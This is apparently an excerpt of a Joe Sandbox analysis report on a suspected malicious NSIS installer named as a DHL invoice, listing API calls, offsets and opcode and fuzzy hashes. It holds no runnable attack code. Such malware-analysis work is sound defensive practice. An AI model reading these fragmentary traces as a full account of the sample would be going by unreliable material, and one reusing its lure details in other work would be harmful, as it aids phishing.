                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CountTick$wsprintf
                                            • String ID: ... %d%%
                                            • API String ID: 551687249-2449383134
                                            • Opcode ID: f5d90bcb7ebd89fe1cd05b14302609a37f21c12a4aba64411c0a4f0db4ef4cc6
                                            • Instruction ID: 381bea1cd078569db79acba847b1f3aad866332683383cfda6df38e9538e1e3d
                                            • Opcode Fuzzy Hash: f5d90bcb7ebd89fe1cd05b14302609a37f21c12a4aba64411c0a4f0db4ef4cc6
                                            • Instruction Fuzzy Hash: 91513D71800219EBDB10DF65DA84B9E7BB8EB5535AF14417BEC00B72D0CB789A50CBA9
                                            APIs
                                            • CharNextA.USER32(?,*?|<>/":,00000000,?,767D3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,?,0000000A,?), ref: 004065DF
                                            • CharNextA.USER32(?,?,?,00000000,?,767D3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,?,0000000A,?), ref: 004065EC
                                            • CharNextA.USER32(?,?,767D3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,?,0000000A,?), ref: 004065F1
                                            • CharPrevA.USER32(?,?,767D3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,?,0000000A,?), ref: 00406601
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: *?|<>/":
                                            • API String ID: 589700163-165019052
                                            • Opcode ID: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                            • Instruction ID: 9f335943bb0e62a209881404c60ffb6aa99012b8199ff17f999404b9432e9d26
                                            • Opcode Fuzzy Hash: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                            • Instruction Fuzzy Hash: 871104618053923DFB3216282C44B777F894F97760F1A007FE5C2722C6CA7C5C62966D
                                            APIs
                                            • lstrcatA.KERNEL32(00000000,00000000,0040A430,00435800,00000000,00000000,00000031), ref: 004017BD
                                            • CompareFileTime.KERNEL32(-00000014,?,0040A430,0040A430,00000000,00000000,0040A430,00435800,00000000,00000000,00000031), ref: 004017E7
                                              • Part of subcall function 0040628D: lstrcpynA.KERNEL32(?,?,00000400,0040357B,0042E820,NSIS Error,?,?,0000000A,?), ref: 0040629A
                                              • Part of subcall function 004053D1: lstrlenA.KERNEL32(00429C68,00000000,?,767D23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                              • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,767D23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                              • Part of subcall function 004053D1: lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,767D23A0), ref: 0040542D
                                              • Part of subcall function 004053D1: SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID:
                                            • API String ID: 1941528284-0
                                            • Opcode ID: 1a1072c2038cbf95956adf311cc3bef911504581aab660e216232240bcca97c3
                                            • Instruction ID: a1f186b67c4edeb34fad59b9cedf70daa635d1c2101920768012b0df21243cfe
                                            • Opcode Fuzzy Hash: 1a1072c2038cbf95956adf311cc3bef911504581aab660e216232240bcca97c3
                                            • Instruction Fuzzy Hash: 6041C331900515BBCB107BA5CD46EAF3A78DF05328F20823FF526F11E2D67C8A519AAD
                                            APIs
                                            • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CloseEnum$DeleteValue
                                            • String ID:
                                            • API String ID: 1354259210-0
                                            • Opcode ID: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                            • Instruction ID: 6dce0a33df475c695949d28520f5422678f12aee2cc84e9e423a55bf09ef2c56
                                            • Opcode Fuzzy Hash: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                            • Instruction Fuzzy Hash: 3B215C7250010CBBDF129F90CE89EEF7B6DEB44344F100076FA15B11A0E7B48F54AAA8
                                            APIs
                                            • GetDlgItem.USER32(?,?), ref: 00401DA3
                                            • GetClientRect.USER32(?,?), ref: 00401DF1
                                            • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
                                            • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
                                            • DeleteObject.GDI32(00000000), ref: 00401E45
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                            • Instruction ID: fce380eb4141a570f491a0e518fb8aa8e4aa376f46a8457bbd9b5af61eb39f7b
                                            • Opcode Fuzzy Hash: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                            • Instruction Fuzzy Hash: AE210A72E00509AFDF15DF94DD45AAEBBB6FB48300F10407AF505F62A1CB389941DB58
                                            APIs
                                            • GetDC.USER32(?), ref: 00401E5D
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
                                            • ReleaseDC.USER32(?,00000000), ref: 00401E90
                                            • CreateFontIndirectA.GDI32(0040B830), ref: 00401EDF
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID:
                                            • API String ID: 3808545654-0
                                            • Opcode ID: ccc424111de2d8fdc78d27f8554941ebead3544ddde10de4f69b2752e2115fa2
                                            • Instruction ID: 3235dfa2473664f3223cdf9cba53c0ab50ba273bd9661b34cbd5463b8b999ac8
                                            • Opcode Fuzzy Hash: ccc424111de2d8fdc78d27f8554941ebead3544ddde10de4f69b2752e2115fa2
                                            • Instruction Fuzzy Hash: FE017572504344AFE7107B60AE49B9E3FF8E715701F10897AF181B62F2CB7800058B6D
                                            APIs
                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                            • Instruction ID: 290ea32ff0ec2f544a370e30947e4a0d8eefe4f8a949274a77cee2e27ce3354c
                                            • Opcode Fuzzy Hash: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                            • Instruction Fuzzy Hash: E121B471948209BFEF05AFA4DA86AAE7FB1EF44304F20447EF105B61D1C6B98681DB18
                                            APIs
                                            • lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                            • wsprintfA.USER32 ref: 00404C1C
                                            • SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s
                                            • API String ID: 3540041739-3551169577
                                            • Opcode ID: 535e9ddcb49fc2af00bd827ff7e70f18c38bbd05e3bf044e223da0312c8e4865
                                            • Instruction ID: 5f9a4297b7b6a3636d8a8bee3f83e4b2b5f26aab9c0b753bab98504590b6652f
                                            • Opcode Fuzzy Hash: 535e9ddcb49fc2af00bd827ff7e70f18c38bbd05e3bf044e223da0312c8e4865
                                            • Instruction Fuzzy Hash: BE110A73A041243BEB0065AD9C45FAE3698DB85374F250237FE26F61D1EA78DC1281E9
                                            APIs
                                            • GetModuleHandleA.KERNEL32(00000000,00000001,?), ref: 004020F5
                                              • Part of subcall function 004053D1: lstrlenA.KERNEL32(00429C68,00000000,?,767D23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                              • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,767D23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                              • Part of subcall function 004053D1: lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,767D23A0), ref: 0040542D
                                              • Part of subcall function 004053D1: SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                              • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                            • LoadLibraryExA.KERNEL32(00000000,?,?,00000001,?), ref: 00402105
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00402115
                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,?,00000001,?), ref: 0040217F
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2987980305-0
                                            • Opcode ID: d236e91e9817b245ae95546f76f8452ffb34461b05ce790c6aa1380878e74418
                                            • Instruction ID: 18bbb9f6491bb16bc869df63e9f5beea4603ad23440c914569cabcc4b16c920a
                                            • Opcode Fuzzy Hash: d236e91e9817b245ae95546f76f8452ffb34461b05ce790c6aa1380878e74418
                                            • Instruction Fuzzy Hash: ED21C931A00115BBCF20BF659F89B6F7570AB40358F20413BF611B61D1CABD49839A5E
                                            APIs
                                            • DestroyWindow.USER32(?,00000000,004030AB,00000001,?,?,00403722,?,?,?,0000000A,?), ref: 00402EE0
                                            • GetTickCount.KERNEL32 ref: 00402EFE
                                            • CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F1B
                                            • ShowWindow.USER32(00000000,00000005,?,?,00403722,?,?,?,0000000A,?), ref: 00402F29
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            • Opcode ID: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                            • Instruction ID: 55e8d60830c64a568362c8f460213b41695a60035779f7009bf19f5ad348a086
                                            • Opcode Fuzzy Hash: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                            • Instruction Fuzzy Hash: B7F03A30A45621EBC771AB50FE0CA9B7B64FB05B59B41043AF001F11A9CB745852DBED
                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 00405374
                                            • CallWindowProcA.USER32(?,?,?,?), ref: 004053C5
                                              • Part of subcall function 00404379: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040438B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                                            • Instruction ID: 98c6722e6a54b641667f931c9e29074c60bd52ab0debc5010bc9b6450a54dc72
                                            • Opcode Fuzzy Hash: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                                            • Instruction Fuzzy Hash: 9201B171100608AFFF205F11ED84A6B3A26EB84794F50413BFE407A1D1C3B98C629E5E
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405E63
                                            • GetTempFileNameA.KERNEL32(?,?,00000000,?,?,004033D6,00436000,00436400,00436400,00436400,00436400,00436400,00436400,004036B5,?,?), ref: 00405E7D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: nsa
                                            • API String ID: 1716503409-2209301699
                                            • Opcode ID: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                            • Instruction ID: 3970c65dfeb72379d163dc795dbdbe3f0392b49dfad0d6f3c406a96719355742
                                            • Opcode Fuzzy Hash: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                            • Instruction Fuzzy Hash: A0F082363042046BDB109F56EC04B9B7B9CEF91750F10803BF9889B180D6B099558798
                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405DAD
                                            • CharNextA.USER32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DBE
                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                            • Instruction ID: 0b01db06aa3b468373a9359c006e34c779135354681a34c4aba1de8cdbfa9028
                                            • Opcode Fuzzy Hash: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                            • Instruction Fuzzy Hash: 86F0C231100418AFC7029BA5CE0499EBBA8EF06250B2180AAE840F7211D674DE01AB6C